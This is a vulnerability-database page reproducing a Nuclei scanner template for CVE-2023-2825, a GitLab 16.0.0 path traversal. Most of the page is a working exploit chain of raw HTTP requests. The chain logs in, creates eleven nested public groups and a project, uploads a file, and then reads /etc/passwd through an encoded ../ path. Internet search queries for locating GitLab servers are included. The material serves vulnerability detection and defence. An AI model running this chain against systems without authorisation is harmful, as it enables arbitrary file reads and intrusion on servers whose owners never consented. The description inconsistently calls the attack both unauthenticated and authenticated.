GitLab 16.0.0 - Path Traversal

26 Jun 2026 18:13:08 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

GitLab 16.0.0 Path Traversal CVE-2023-2825: Unauthenticated users exploit path traversal vulnerability to read server files in public nested projec

Code
id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  impact: |
    Authenticated attackers can exploit path traversal vulnerabilities to read arbitrary files from GitLab 16.0.0 servers when attachments exist in public projects nested within at least five groups.
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.71641
    epss-percentile: 0.99341
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive,vuln
variables:
  data: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--
      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 726f6f743a78
        encoding: hex

      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    extractors:
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# digest: 4a0a0047304502200fafff50b065860e29e36641b9c3d98f6fcc7f3562548c2c6cf8b3348c9f227202210097fffa68731e96a1fbb45db3cbe341c790918d63f75f55b6fbb621160d716743:922c64590222798bb761d5b6d8e72950

Scores as of 04 Feb 2026 07:00 (current): Vulners AI Score 7.2 (High risk) | CVSS 3.1: 7.5 - 10 | EPSS: 0.71641